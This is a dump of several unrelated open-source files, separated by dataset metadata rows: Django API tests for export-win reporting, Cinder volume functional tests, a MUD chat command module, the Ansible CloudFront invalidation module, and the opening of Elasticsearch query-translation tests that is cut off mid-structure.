api_response = self._api_response_data
self.assertTrue(len(api_response) > 5)
def test_top_hvc_with_confirmed_hvc_wins_one_sector_diff_country(self):
""" Number of Top hvc wins will be more than 1 when there are
confirmed hvc wins of diff country one sector """
for code in ['BS', 'GQ', 'VA', 'AQ', 'SA', 'EG', 'LU', 'ER', 'GA', 'MP']:
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
country=code,
sector_id=self.FIRST_TEAM_1_SECTOR,
confirm=True,
win_date=self.win_date_2017,
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 10)
def test_top_hvc_with_confirmed_hvc_wins_one_sector_one_country(self):
""" Number of Top hvc wins will be 1 when there are
confirmed hvc wins of diff country one sector """
for _ in range(1, 10):
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
country="HU",
sector_id=self.FIRST_TEAM_1_SECTOR,
confirm=True,
win_date=self.win_date_2017,
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 1)
def test_values_top_hvc_top_win_with_confirmed_hvc_wins(self):
""" Check top win is what is expected and its value, percentages are correct """
expected_top_team = self.FIRST_TEAM_1_SECTOR
for _ in range(0, 5):
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
country="HU",
sector_id=expected_top_team,
confirm=True,
win_date=self.win_date_2017,
)
for sector_id in self.SECTORS_NOT_IN_EITHER_TEAM:
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
country="HU",
confirm=True,
sector_id=sector_id,
win_date=self.win_date_2017,
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 7)
top_item = api_response[0]
self.assertEqual(top_item["sector"], self.SECTORS_DICT[expected_top_team], msg=top_item)
self.assertEqual(top_item["totalValue"], 100000 * 5, msg=top_item)
self.assertEqual(top_item["averageWinValue"], 100000)
self.assertEqual(top_item["percentComplete"], 100)
def test_top_hvc_compare_second_top_win_with_top(self):
""" Check second top win with top, its value, percentages are correct """
expected_top_team = self.FIRST_TEAM_1_SECTOR
expected_second_team = self.SECOND_TEAM_1_SECTOR
for _ in range(0, 5):
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
country="HU",
sector_id=expected_top_team,
confirm=True,
win_date=self.win_date_2017,
)
for _ in range(0, 4):
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
sector_id=expected_second_team,
confirm=True,
country="HU",
win_date=self.win_date_2017,
)
for sector_id in self.SECTORS_NOT_IN_EITHER_TEAM:
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
confirm=True,
country="HU",
sector_id=sector_id,
win_date=self.win_date_2017,
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 8, msg=api_response)
second_top_item = api_response[1]
percent_complete = int((100000 * 4 * 100) / (100000 * 5))
self.assertEqual(second_top_item["sector"], self.SECTORS_DICT[expected_second_team])
self.assertEqual(second_top_item["totalValue"], 100000 * 4)
self.assertEqual(second_top_item["averageWinValue"], 100000)
self.assertEqual(second_top_item["percentComplete"], percent_complete)
def test_top_hvc_check_items_percent_is_descending(self):
""" Check percentage value is in descending order """
for i in range(6, 1, -1):
for _ in range(0, i):
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
sector_id=self.TEAM_1_SECTORS[i],
country="HU",
confirm=True,
win_date=self.win_date_2017,
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertTrue(len(api_response) >= 5)
self.assertTrue(api_response[0]["percentComplete"] >= api_response[1]["percentComplete"])
self.assertTrue(api_response[1]["percentComplete"] >= api_response[2]["percentComplete"])
self.assertTrue(api_response[2]["percentComplete"] >= api_response[3]["percentComplete"])
self.assertTrue(api_response[3]["percentComplete"] >= api_response[4]["percentComplete"])
def test_top_hvc_check_items_totalValue_is_descending(self):
""" Check total value is in descending order """
for i in range(6, 1, -1):
for _ in range(0, i):
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
sector_id=self.TEAM_1_SECTORS[i],
country="HU",
confirm=True,
win_date=self.win_date_2017,
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertTrue(len(api_response) >= 5)
self.assertTrue(api_response[0]["totalValue"] >= api_response[1]["totalValue"])
self.assertTrue(api_response[1]["totalValue"] >= api_response[2]["totalValue"])
self.assertTrue(api_response[2]["totalValue"] >= api_response[3]["totalValue"])
self.assertTrue(api_response[3]["totalValue"] >= api_response[4]["totalValue"])
def test_top_hvc_check_items_averageWinValue_is_descending(self):
""" Check average Win Value is in descending order """
for i in range(6, 1, -1):
for _ in range(0, i):
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
sector_id=self.TEAM_1_SECTORS[i],
country="HU",
confirm=True,
win_date=self.win_date_2017,
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertTrue(len(api_response) >= 5)
self.assertTrue(api_response[0]["averageWinValue"] >= api_response[1]["averageWinValue"])
self.assertTrue(api_response[1]["averageWinValue"] >= api_response[2]["averageWinValue"])
self.assertTrue(api_response[2]["averageWinValue"] >= api_response[3]["averageWinValue"])
self.assertTrue(api_response[3]["averageWinValue"] >= api_response[4]["averageWinValue"])
def test_top_hvc_with_hvc_wins_from_diff_campaign(self):
for code in self.TEAM_1_HVCS:
self._create_hvc_win(
hvc_code=code,
win_date=self.win_date_2017,
confirm=True,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 0)
def test_top_hvc_with_hvc_wins_from_2016(self):
for _ in range(1, 10):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2016,
response_date=self.win_date_2016,
confirm=True,
fin_year=2016,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 0)
def test_top_hvc_with_hvc_wins_from_2017_in_2016(self):
for _ in range(1, 10):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2017,
confirm=True,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2016)
api_response = self._api_response_data
self.assertEqual(len(api_response), 0)
def test_top_hvc_hvc_win_from_2016_confirmed_in_2017_doesnt_appears_in_2016(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2016,
response_date=self.win_date_2017,
confirm=True,
fin_year=2016,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2016)
api_response = self._api_response_data
self.assertEqual(len(api_response), 0)
def test_top_hvc_hvc_win_from_2016_confirmed_in_2017_appears_in_2017(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2016,
response_date=self.win_date_2017,
confirm=True,
fin_year=2016,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 1)
@freeze_time(MiApiViewsBaseTestCase.frozen_date_17)
class HVCWinTableTestCase(HVCBaseViewTestCase, GenericWinTableTestMixin):
TEST_CAMPAIGN_ID = "E002"
TEST_COUNTRY_CODE = 'HU'
cen_win_table_url = reverse('mi:hvc_win_table', kwargs={"campaign_id": "E002"})
win_table_url_2016_only = reverse('mi:hvc_win_table', kwargs={"campaign_id": "E177"})
win_table_url_2017_only = reverse('mi:hvc_win_table', kwargs={"campaign_id": "E218"})
# disable non_hvc tests
test_win_table_2017_confirmed_non_hvc = None
test_win_table_2017_unconfirmed_non_hvc = None
@classmethod
def setUpClass(cls):
super().setUpClass()
call_command('create_missing_hvcs', verbose=False)
    # make names consistent for both years
HVC.objects.filter(
campaign_id=cls.TEST_CAMPAIGN_ID
).update(
name=f'HVC: {cls.TEST_CAMPAIGN_ID}'
)
def setUp(self):
super().setUp()
self._win_factory_function = create_win_factory(
self.user, sector_choices=self.TEAM_1_SECTORS)
self.view_base_url = self.cen_win_table_url
self.expected_response = {
"hvc": {
"code": "E002",
"name": "HVC: E002",
},
"wins": {
"hvc": []
}
}
def test_2017_win_table_in_2016_404(self):
self.view_base_url = self.win_table_url_2017_only
self.url = self.get_url_for_year(2016)
self._get_api_response(self.url, status_code=404)
def test_2016_win_table_in_2017_404(self):
self.view_base_url = self.win_table_url_2016_only
self.url = self.get_url_for_year(2017)
self._get_api_response(self.url, status_code=404)
def test_win_table_2017_one_confirmed_rejected_hvc_win(self):
self._create_hvc_win(
hvc_code='E002',
win_date=self.win_date_2017,
response_date=self.win_date_2017,
confirm=True,
agree_with_win=False,
fin_year=2016,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertTrue(len(api_response["wins"]["hvc"]) == 1)
win_item = api_response["wins"]["hvc"][0]
self.assertEqual(api_response["hvc"]["code"], "E002")
self.assertIsNotNone(win_item["win_date"])
self.assertEqual(win_item["export_amount"], self.export_value)
self.assertEqual(win_item["status"], "customer_rejected")
self.assertEqual(win_item["lead_officer"]["name"], "lead officer name")
self.assertEqual(win_item["company"]["name"], "company name")
self.assertEqual(win_item["company"]["id"], "cdms reference")
self.assertFalse(win_item["credit"])
def test_win_table_2017_confirmed_non_hvc_empty_result(self):
self._create_non_hvc_win(
win_date=self.win_date_2017,
confirm=True,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
self.assertResponse()
def test_win_table_2017_unconfirmed_non_hvc_empty_result(self):
self._create_non_hvc_win(
win_date=self.win_date_2017,
confirm=False,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
self.assertResponse()
class TestGlobalHVCList(MiApiViewsBaseTestCase):
url = reverse('mi:global_hvcs') + "?year=2017"
def create_global_hvc(self):
fy2017 = FinancialYear.objects.get(id=2017)
campaign_id = 'E%03d' % self.FIRST_TEAM_1_SECTOR
sector_team = SectorTeamFactory.create()
hvc_group = FuzzyChoice(HVCGroup.objects.all())
target = TargetFactory.create(
campaign_id=campaign_id,
financial_year=fy2017,
hvc_group=hvc_group,
sector_team=sector_team
)
TargetCountry(target=target, country=Country.objects.get(country='XG')).save()
return target
def test_2017_returns_1_hvcs(self):
target = self.create_global_hvc()
data = self._api_response_data
self.assertEqual(
data,
[{
"code": target.campaign_id,
"name": f"HVC: {target.campaign_id}"
}]
)
def test_2016_returns_0_hvcs(self):
self.create_global_hvc()
self.url = reverse('mi:global_hvcs') + "?year=2016"
data = self._api_response_data
self.assertEqual(
data,
[]
)
def test_2017_returns_0_hvs_if_none_exist(self):
data = self._api_response_data
self.assertEqual(
data,
[]
)
class TestOpenHVCs(TestCase):
@classmethod
def setUpTestData(cls):
super().setUpTestData()
call_command('create_missing_hvcs', verbose=False)
def test_open_hvcs_can_accept_year_in_2_digit_format(self):
fin_year = normalize_year(16)
self.assertEqual(
16,
fin_year
)
def test_open_hvcs_can_accept_year_in_4_digit_format(self):
fin_year = normalize_year(2016)
self.assertEqual(
fin_year,
16
)
def test_open_hvcs_can_accept_year_in_django_model_format(self):
fy2016 = FinancialYear.objects.get(id=2016)
fin_year = normalize_year(fy2016)
self.assertEqual(
fin_year,
16
)
def test_hvc_in_2016_show_up_in_open_hvcs_list(self):
open_hvcs = _get_open_hvcs(2017)
hvcs2017 = set(HVC.objects.filter(financial_year=17).values_list('campaign_id', flat=True))
self.assertEqual(
open_hvcs,
hvcs2017
)
def test_both2016and2017hvcs_in_2016_open_hvcs_list(self):
open_hvcs = _get_open_hvcs(2016)
hvcs2017 = set(HVC.objects.filter(financial_year=17).values_list('campaign_id', flat=True))
hvcs2016 = set(HVC.objects.filter(financial_year=16).values_list('campaign_id', flat=True))
self.assertEqual(
open_hvcs,
hvcs2017.union(hvcs2016)
)
def test_make_new_financial_year_test_2016_fin_year_is_unaffected(self):
open_hvcs_for_2016 = _get_open_hvcs(2016)
for i in range(10):
HVCFactory.create(
campaign_id='E%03d' % (i + 1),
financial_year=normalize_year(2018)
)
self.assertEqual(
open_hvcs_for_2016,
_get_open_hvcs(2016)
)
def test_make_new_financial_year_test_2018_fin_year_is_correct(self):
for i in range(10):
HVCFactory.create(
campaign_id='E%03d' % (i + 1),
financial_year=normalize_year(2018)
)
open_hvcs_for_2018 = _get_open_hvcs(2018)
self.assertEqual(
open_hvcs_for_2018,
{'E%03d' % (x + 1) for x in range(10)}
)
def test_make_new_financial_year_test_2017_fin_year_is_correct(self):
open_hvcs_for_2017 = _get_open_hvcs(2017)
for i in range(10):
HVCFactory.create(
campaign_id='E%03d' % (i + 1),
financial_year=normalize_year(2018)
)
self.assertEqual(
open_hvcs_for_2017,
_get_open_hvcs(2017)
)
| gpl-3.0 | -5,138,177,416,890,777,000 | 40.575639 | 99 | 0.577568 | false |
eharney/cinder | cinder/tests/functional/test_volumes.py | 1 | 5004 | # Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_utils import uuidutils
from cinder.tests.functional import functional_helpers
from cinder.volume import configuration
class VolumesTest(functional_helpers._FunctionalTestBase):
_vol_type_name = 'functional_test_type'
def setUp(self):
super(VolumesTest, self).setUp()
self.api.create_type(self._vol_type_name)
def _get_flags(self):
f = super(VolumesTest, self)._get_flags()
f['volume_driver'] = (
{'v': 'cinder.tests.fake_driver.FakeLoggingVolumeDriver',
'g': configuration.SHARED_CONF_GROUP})
f['default_volume_type'] = {'v': self._vol_type_name}
return f
def test_get_volumes_summary(self):
"""Simple check that listing volumes works."""
volumes = self.api.get_volumes(False)
self.assertIsNotNone(volumes)
def test_get_volumes(self):
"""Simple check that listing volumes works."""
volumes = self.api.get_volumes()
self.assertIsNotNone(volumes)
def test_create_and_delete_volume(self):
"""Creates and deletes a volume."""
# Create volume
created_volume = self.api.post_volume({'volume': {'size': 1}})
self.assertTrue(uuidutils.is_uuid_like(created_volume['id']))
created_volume_id = created_volume['id']
# Check it's there
found_volume = self.api.get_volume(created_volume_id)
self.assertEqual(created_volume_id, found_volume['id'])
self.assertEqual(self._vol_type_name, found_volume['volume_type'])
# It should also be in the all-volume list
volumes = self.api.get_volumes()
volume_names = [volume['id'] for volume in volumes]
self.assertIn(created_volume_id, volume_names)
# Wait (briefly) for creation. Delay is due to the 'message queue'
found_volume = self._poll_volume_while(created_volume_id, ['creating'])
# It should be available...
self.assertEqual('available', found_volume['status'])
# Delete the volume
self.api.delete_volume(created_volume_id)
# Wait (briefly) for deletion. Delay is due to the 'message queue'
found_volume = self._poll_volume_while(created_volume_id, ['deleting'])
# Should be gone
self.assertFalse(found_volume)
def test_create_volume_with_metadata(self):
"""Creates a volume with metadata."""
# Create volume
metadata = {'key1': 'value1',
'key2': 'value2'}
created_volume = self.api.post_volume(
{'volume': {'size': 1,
'metadata': metadata}})
self.assertTrue(uuidutils.is_uuid_like(created_volume['id']))
created_volume_id = created_volume['id']
# Check it's there and metadata present
found_volume = self.api.get_volume(created_volume_id)
self.assertEqual(created_volume_id, found_volume['id'])
self.assertEqual(metadata, found_volume['metadata'])
def test_create_volume_in_availability_zone(self):
"""Creates a volume in availability_zone."""
# Create volume
availability_zone = 'nova'
created_volume = self.api.post_volume(
{'volume': {'size': 1,
'availability_zone': availability_zone}})
self.assertTrue(uuidutils.is_uuid_like(created_volume['id']))
created_volume_id = created_volume['id']
# Check it's there and availability zone present
found_volume = self.api.get_volume(created_volume_id)
self.assertEqual(created_volume_id, found_volume['id'])
self.assertEqual(availability_zone, found_volume['availability_zone'])
def test_create_and_update_volume(self):
# Create vol1
created_volume = self.api.post_volume({'volume': {
'size': 1, 'name': 'vol1'}})
self.assertEqual('vol1', created_volume['name'])
created_volume_id = created_volume['id']
# update volume
body = {'volume': {'name': 'vol-one'}}
updated_volume = self.api.put_volume(created_volume_id, body)
self.assertEqual('vol-one', updated_volume['name'])
# check for update
found_volume = self.api.get_volume(created_volume_id)
self.assertEqual(created_volume_id, found_volume['id'])
self.assertEqual('vol-one', found_volume['name'])
| apache-2.0 | 4,194,754,191,102,223,000 | 38.09375 | 79 | 0.635092 | false |
genzgd/Lampost-Mud | lampmud/mud/chat.py | 1 | 1548 | from lampost.gameops.action import ActionError
from lampost.di.resource import Injected, module_inject
from lampmud.mud.action import mud_action
sm = Injected('session_manager')
module_inject(__name__)
@mud_action('emote', target_class='cmd_str')
def emote(source, target):
source.broadcast(raw="{}{} {}".format('' if source.imm_level else ':', source.name, target))
@mud_action('tell', target_class="player_online", obj_class="cmd_str")
def tell(source, target, obj):
tell_message(source, target, obj)
def tell_message(source, player, statement):
if not statement:
return source.display_line("Say what to " + player.name + "?")
player.last_tell = source.dbo_id
player.display_line(source.name + " tells you, `" + statement + "'", 'tell_from')
source.display_line("You tell " + player.name + ", `" + statement + "'", 'tell_to')
@mud_action('reply', target_class='cmd_str')
def reply(source, target):
if not source.last_tell:
raise ActionError("You have not received a tell recently.")
session = sm.player_session(source.last_tell)
if session:
tell_message(source, session.player, target)
    else:
        last_tell = source.last_tell
        source.last_tell = None
        return source.display_line("{} is no longer logged in".format(last_tell))
@mud_action('say', target_class='cmd_str')
def say(source, target):
source.display_line("You say, `{}'".format(target), display='say')
source.broadcast(raw="{} says, `{}'".format(source.name, target),
display='say', silent=True)
| mit | 6,273,739,487,291,257,000 | 35 | 96 | 0.662791 | false |
Lujeni/ansible | lib/ansible/modules/cloud/amazon/cloudfront_invalidation.py | 1 | 10548 | #!/usr/bin/python
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cloudfront_invalidation
short_description: create invalidations for AWS CloudFront distributions
description:
- Allows for invalidation of a batch of paths for a CloudFront distribution.
requirements:
- boto3 >= 1.0.0
- python >= 2.6
version_added: "2.5"
author: Willem van Ketwich (@wilvk)
extends_documentation_fragment:
- aws
- ec2
options:
distribution_id:
description:
- The ID of the CloudFront distribution to invalidate paths for. Can be specified instead of the alias.
required: false
type: str
alias:
description:
- The alias of the CloudFront distribution to invalidate paths for. Can be specified instead of distribution_id.
required: false
type: str
caller_reference:
description:
- A unique reference identifier for the invalidation paths.
- Defaults to current datetime stamp.
required: false
default:
type: str
target_paths:
description:
      - A list of paths on the distribution to invalidate. Each path should begin with '/'. Wildcards are allowed, e.g. '/foo/bar/*'.
required: true
type: list
elements: str
notes:
- does not support check mode
'''
EXAMPLES = '''
- name: create a batch of invalidations using a distribution_id for a reference
cloudfront_invalidation:
distribution_id: E15BU8SDCGSG57
caller_reference: testing 123
target_paths:
- /testpathone/test1.css
- /testpathtwo/test2.js
- /testpaththree/test3.ss
- name: create a batch of invalidations using an alias as a reference and one path using a wildcard match
cloudfront_invalidation:
alias: alias.test.com
caller_reference: testing 123
target_paths:
- /testpathone/test4.css
- /testpathtwo/test5.js
- /testpaththree/*
'''
RETURN = '''
invalidation:
description: The invalidation's information.
returned: always
type: complex
contains:
create_time:
description: The date and time the invalidation request was first made.
returned: always
type: str
sample: '2018-02-01T15:50:41.159000+00:00'
id:
description: The identifier for the invalidation request.
returned: always
type: str
sample: I2G9MOWJZFV612
invalidation_batch:
description: The current invalidation information for the batch request.
returned: always
type: complex
contains:
caller_reference:
description: The value used to uniquely identify an invalidation request.
returned: always
type: str
sample: testing 123
paths:
description: A dict that contains information about the objects that you want to invalidate.
returned: always
type: complex
contains:
items:
description: A list of the paths that you want to invalidate.
returned: always
type: list
sample:
- /testpathtwo/test2.js
- /testpathone/test1.css
- /testpaththree/test3.ss
quantity:
description: The number of objects that you want to invalidate.
returned: always
type: int
sample: 3
status:
description: The status of the invalidation request.
returned: always
type: str
sample: Completed
location:
description: The fully qualified URI of the distribution and invalidation batch request.
returned: always
type: str
sample: https://cloudfront.amazonaws.com/2017-03-25/distribution/E1ZID6KZJECZY7/invalidation/I2G9MOWJZFV622
'''
from ansible.module_utils.ec2 import get_aws_connection_info
from ansible.module_utils.ec2 import ec2_argument_spec, boto3_conn
from ansible.module_utils.ec2 import snake_dict_to_camel_dict
from ansible.module_utils.ec2 import camel_dict_to_snake_dict
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.aws.cloudfront_facts import CloudFrontFactsServiceManager
import datetime
try:
from botocore.exceptions import ClientError, BotoCoreError
except ImportError:
pass # caught by imported AnsibleAWSModule
class CloudFrontInvalidationServiceManager(object):
"""
Handles CloudFront service calls to AWS for invalidations
"""
def __init__(self, module):
self.module = module
self.create_client('cloudfront')
def create_client(self, resource):
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(self.module, boto3=True)
self.client = boto3_conn(self.module, conn_type='client', resource=resource, region=region, endpoint=ec2_url, **aws_connect_kwargs)
def create_invalidation(self, distribution_id, invalidation_batch):
current_invalidation_response = self.get_invalidation(distribution_id, invalidation_batch['CallerReference'])
try:
response = self.client.create_invalidation(DistributionId=distribution_id, InvalidationBatch=invalidation_batch)
response.pop('ResponseMetadata', None)
if current_invalidation_response:
return response, False
else:
return response, True
except BotoCoreError as e:
self.module.fail_json_aws(e, msg="Error creating CloudFront invalidations.")
except ClientError as e:
if ('Your request contains a caller reference that was used for a previous invalidation batch '
'for the same distribution.' in e.response['Error']['Message']):
self.module.warn("InvalidationBatch target paths are not modifiable. "
"To make a new invalidation please update caller_reference.")
return current_invalidation_response, False
else:
self.module.fail_json_aws(e, msg="Error creating CloudFront invalidations.")
def get_invalidation(self, distribution_id, caller_reference):
current_invalidation = {}
# find all invalidations for the distribution
try:
paginator = self.client.get_paginator('list_invalidations')
invalidations = paginator.paginate(DistributionId=distribution_id).build_full_result().get('InvalidationList', {}).get('Items', [])
invalidation_ids = [inv['Id'] for inv in invalidations]
except (BotoCoreError, ClientError) as e:
self.module.fail_json_aws(e, msg="Error listing CloudFront invalidations.")
# check if there is an invalidation with the same caller reference
for inv_id in invalidation_ids:
try:
invalidation = self.client.get_invalidation(DistributionId=distribution_id, Id=inv_id)['Invalidation']
caller_ref = invalidation.get('InvalidationBatch', {}).get('CallerReference')
except (BotoCoreError, ClientError) as e:
self.module.fail_json_aws(e, msg="Error getting CloudFront invalidation {0}".format(inv_id))
if caller_ref == caller_reference:
current_invalidation = invalidation
break
current_invalidation.pop('ResponseMetadata', None)
return current_invalidation
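
    # Illustrative shape of the dict returned above when a matching
    # invalidation exists (field names follow the boto3 CloudFront API;
    # the values here are invented):
    #
    #   {'Id': 'I2G9MOWJZFV612',
    #    'Status': 'Completed',
    #    'CreateTime': datetime(...),
    #    'InvalidationBatch': {
    #        'Paths': {'Quantity': 1, 'Items': ['/index.html']},
    #        'CallerReference': 'testing 123'}}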
class CloudFrontInvalidationValidationManager(object):
"""
Manages CloudFront validations for invalidation batches
"""
def __init__(self, module):
self.module = module
self.__cloudfront_facts_mgr = CloudFrontFactsServiceManager(module)
def validate_distribution_id(self, distribution_id, alias):
try:
if distribution_id is None and alias is None:
self.module.fail_json(msg="distribution_id or alias must be specified")
if distribution_id is None:
distribution_id = self.__cloudfront_facts_mgr.get_distribution_id_from_domain_name(alias)
return distribution_id
except (ClientError, BotoCoreError) as e:
self.module.fail_json_aws(e, msg="Error validating parameters.")
def create_aws_list(self, invalidation_batch):
aws_list = {}
aws_list["Quantity"] = len(invalidation_batch)
aws_list["Items"] = invalidation_batch
return aws_list
def validate_invalidation_batch(self, invalidation_batch, caller_reference):
try:
if caller_reference is not None:
valid_caller_reference = caller_reference
else:
valid_caller_reference = datetime.datetime.now().isoformat()
valid_invalidation_batch = {
'paths': self.create_aws_list(invalidation_batch),
'caller_reference': valid_caller_reference
}
return valid_invalidation_batch
except (ClientError, BotoCoreError) as e:
self.module.fail_json_aws(e, msg="Error validating invalidation batch.")
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
caller_reference=dict(),
distribution_id=dict(),
alias=dict(),
target_paths=dict(required=True, type='list')
))
module = AnsibleAWSModule(argument_spec=argument_spec, supports_check_mode=False, mutually_exclusive=[['distribution_id', 'alias']])
validation_mgr = CloudFrontInvalidationValidationManager(module)
service_mgr = CloudFrontInvalidationServiceManager(module)
caller_reference = module.params.get('caller_reference')
distribution_id = module.params.get('distribution_id')
alias = module.params.get('alias')
target_paths = module.params.get('target_paths')
result = {}
distribution_id = validation_mgr.validate_distribution_id(distribution_id, alias)
valid_target_paths = validation_mgr.validate_invalidation_batch(target_paths, caller_reference)
valid_pascal_target_paths = snake_dict_to_camel_dict(valid_target_paths, True)
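    # snake_dict_to_camel_dict with its second argument set to True yields the
    # casing boto3 expects, e.g. {'Paths': {'Quantity': 2, 'Items': [...]},
    # 'CallerReference': 'ref-1'}.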
result, changed = service_mgr.create_invalidation(distribution_id, valid_pascal_target_paths)
module.exit_json(changed=changed, **camel_dict_to_snake_dict(result))
if __name__ == '__main__':
main()
| gpl-3.0 | 2,975,625,500,619,000,000 | 36.140845 | 143 | 0.664865 | false |
trustedanalytics/data-catalog | tests/test_query_translation.py | 1 | 16431 | #
# Copyright (c) 2015 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import unittest
from ddt import ddt, data, unpack
from data_catalog.query_translation import ElasticSearchQueryTranslator, \
ElasticSearchFilterExtractor, ElasticSearchBaseQueryCreator, InvalidQueryError
from unittest import TestCase
@ddt
class FilterExtractorTests(TestCase):
def setUp(self):
self.filter_extractor = ElasticSearchFilterExtractor()
# first uuids (list), then input filters (list),
# then output query filters (json)
# then output post_filters (json)
# then dataset_filtering value (True, False, None)
example_singleFilter_org = (
['org-id-001'],
[{'format': ['csv']}],
{
'or': [
{'term': {'orgUUID': 'org-id-001'}},
{'term': {'isPublic': 'true'}}
]
},
{
'and': [
{'term': {'format': 'csv'}}
]
},
None
)
example_singleFilter_onlyPublic = (
['org-id-001'],
[{'format': ['csv']}],
{
'and': [
{'term': {'isPublic': 'true'}}
]
},
{
'and': [
{'term': {'format': 'csv'}}
]
},
True
)
example_singleFilter_onlyPrivate = (
['org-id-001'],
[{'format': ['csv']}],
{
'and': [
{'term': {'orgUUID': 'org-id-001'}},
{'term': {'isPublic': 'false'}}
]
},
{
'and': [
{'term': {'format': 'csv'}}
]
},
False
)
example_multivaluedFilterQuery_org = (
['org-id-002'],
[
{'category': ['health', 'finance']}
],
{
'or': [
{'term': {'orgUUID': 'org-id-002'}},
{'term': {'isPublic': 'true'}}
]
},
{
'and': [
{'terms': {'category': ['health', 'finance']}}
]
},
None
)
example_multivaluedFilterQuery_onlyPublic = (
['org-id-002'],
[
{'category': ['health', 'finance']}
],
{
'and': [
{'term': {'isPublic': 'true'}}
]
},
{
'and': [
{'terms': {'category': ['health', 'finance']}}
]
},
True
)
example_multivaluedFilterQuery_onlyPrivate = (
['org-id-002'],
[
{'category': ['health', 'finance']}
],
{
'and': [
{'term': {'orgUUID': 'org-id-002'}},
{'term': {'isPublic': 'false'}}
]
},
{
'and': [
{'terms': {'category': ['health', 'finance']}}
]
},
False
)
example_multipleFilterQuery_org = (
['org-id-003'],
[
{'format': ['csv']},
{'category': ['health']}
],
{
'or': [
{'term': {'orgUUID': 'org-id-003'}},
{'term': {'isPublic': 'true'}}
]
},
{
'and': [
{'term': {'format': 'csv'}},
{'term': {'category': 'health'}}
]
},
None
)
example_multipleFilterQuery_onlyPublic = (
['org-id-003'],
[
{'format': ['csv']},
{'category': ['health']}
],
{
'and': [
{'term': {'isPublic': 'true'}}
]
},
{
'and': [
{'term': {'format': 'csv'}},
{'term': {'category': 'health'}}
]
},
True
)
example_multipleFilterQuery_onlyPrivate = (
['org-id-003'],
[
{'format': ['csv']},
{'category': ['health']}
],
{
'and': [
{'term': {'orgUUID': 'org-id-003'}},
{'term': {'isPublic': 'false'}}
]
},
{
'and': [
{'term': {'format': 'csv'}},
{'term': {'category': 'health'}}
]
},
False
)
example_upperCaseFilterValue_org = (
['org-id-004'],
[
{'format': ['CSV']}
],
{
'or': [
{'term': {'orgUUID': 'org-id-004'}},
{'term': {'isPublic': 'true'}}
]
},
{
'and': [
{'term': {'format': 'csv'}}
]
},
None
)
example_upperCaseFilterValue_onlyPublic = (
['org-id-004', 'public'],
[
{'format': ['CSV']}
],
{
'and': [
{'term': {'isPublic': 'true'}}
]
},
{
'and': [
{'term': {'format': 'csv'}}
]
},
True
)
example_upperCaseFilterValue_onlyPrivate = (
['org-id-004'],
[
{'format': ['CSV']}
],
{
'and': [
{'term': {'orgUUID': 'org-id-004'}},
{'term': {'isPublic': 'false'}}
]
},
{
'and': [
{'term': {'format': 'csv'}}
]
},
False
)
example_fromToTimeQuery_org = (
['org-id-005'],
[
{'creationTime': ['2014-05-18', '2014-11-03']}
],
{
'and': [
{'range': {'creationTime': {'from': '2014-05-18', 'to': '2014-11-03'}}},
{
'or': [
{'term': {'orgUUID': 'org-id-005'}},
{'term': {'isPublic': 'true'}}
]
}
]
},
{},
None
)
example_fromToTimeQuery_onlyPublic = (
['org-id-005'],
[
{'creationTime': ['2014-05-18', '2014-11-03']}
],
{
'and': [
{'range': {'creationTime': {'from': '2014-05-18', 'to': '2014-11-03'}}},
